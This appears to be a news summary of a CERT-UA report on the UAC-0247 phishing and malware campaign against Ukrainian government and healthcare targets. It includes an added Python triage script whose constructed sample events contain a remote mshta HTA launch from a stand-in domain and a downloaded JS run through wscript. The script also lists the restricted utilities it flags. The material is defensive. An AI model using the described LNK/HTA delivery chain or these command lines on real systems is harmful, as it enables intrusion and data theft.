The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a new cyber campaign that primarily targets government bodies and municipal healthcare facilities, including clinics and emergency hospitals. This campaign, active from March to April 2026, is linked to a group identified as UAC-0247. The origins of this campaign remain unidentified, but its impact has been significant, particularly in the theft of data from Chromium-based web browsers and WhatsApp.
Phishing Tactics and Malware Deployment
The attack begins with phishing emails masquerading as humanitarian aid proposals. These emails contain links that lead recipients either to compromised legitimate websites or to fake sites crafted using AI technologies. The objective is to download a Windows Shortcut (LNK) file, which then executes a remote HTML Application (HTA) using Windows’ “mshta.exe” utility. This HTA file serves as a distraction while a malicious binary injects shellcode into legitimate processes such as “RuntimeBroker.exe.”
Recent observations note the use of a two-stage loader in these attacks. The second stage uses a proprietary executable format that supports the full functionality of the code and encrypts the final payload. This approach underscores the advanced nature of the threat.
Malware Tools and Network Intrusion
Among the tools used in this campaign is RAVENSHELL, a TCP reverse shell that establishes a connection with a command server to execute directives on the targeted system. Additionally, the malware AGINGFLY, developed in C#, is installed to facilitate remote control over infected systems via WebSockets. It can execute commands, operate a keylogger, and deploy further malware.
Complementing AGINGFLY, a PowerShell script called SILENTLOOP is also used. This script carries multiple functionalities, including command execution and configuration updates, and retrieves the IP address of the management server from a Telegram channel.
Tools for Data Extraction and Security Measures
The investigation into this cyber activity revealed the deployment of various open-source tools such as ChromElevator and ZAPiXDESK for extracting data from browsers and WhatsApp, respectively. Network scanning and tunneling utilities like RustScan and Ligolo-Ng were also employed to facilitate the attack’s progression.
Furthermore, evidence suggests that members of Ukraine’s Defense Forces may have been targeted through malicious ZIP archives distributed via Signal, which used DLL side-loading to drop AGINGFLY.
To mitigate this threat, CERT-UA recommends restricting the execution of LNK, HTA, and JS files, along with utilities like “mshta.exe,” “powershell.exe,” and “wscript.exe.” These measures are crucial to reducing the attack surface and preventing further exploitation.
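A defender-side check that follows from this advice, added here as an example and not part of the CERT-UA report: a small triage routine over process-creation events (Sysmon Event ID 1 field names) that flags the restricted utilities, a remote HTA launch via mshta.exe, and LNK/HTA/JS file references. The sample events, domain and paths are constructed for the example.

```python
"""Triage Windows process-creation events against the CERT-UA mitigation advice:
restricted utilities (mshta.exe, powershell.exe, wscript.exe), remote HTA
launches, and LNK/HTA/JS file executions. Sample events are constructed."""
import re
from typing import Dict, List

RESTRICTED_UTILS = {"mshta.exe", "powershell.exe", "wscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A command-line token ending in one of the file types CERT-UA advises blocking.
FILE_RE = re.compile(r"[^\s\"']+\.(?:lnk|hta|js)\b", re.IGNORECASE)

def image_name(path: str) -> str:
    """Lower-cased basename of an image path (accepts backslash or slash)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event deserves review; empty list if none."""
    img = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if img in RESTRICTED_UTILS:
        reasons.append(f"restricted utility executed: {img}")
        if parent == "explorer.exe":
            # Opening a shortcut in Explorer starts its target with explorer.exe
            # as parent, matching the LNK delivery path described in the article.
            reasons.append("started from explorer.exe (consistent with an LNK launch)")
    if img == "mshta.exe" and URL_RE.search(cmd):
        reasons.append("mshta.exe given a URL: remote HTA execution")
    for ref in FILE_RE.findall(cmd):
        reasons.append(f"restricted file type referenced: {ref}")
    return reasons

def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> reasons, keeping only flagged events."""
    return {i: r for i, e in enumerate(events) if (r := flag_event(e))}

# Constructed sample events; field names follow Sysmon Event ID 1 naming.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://aid-proposal.example/offer.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe C:\Users\ann\Downloads\invoice.js"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
]
```

The legitimate scheduled PowerShell run (event 1) is still flagged, which is the point of the advice: the utilities themselves are the blocking target, so exceptions belong in policy, not in the detection.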
This campaign highlights the persistent and evolving nature of cyber threats targeting critical sectors, underscoring the need for enhanced cybersecurity measures and constant vigilance.
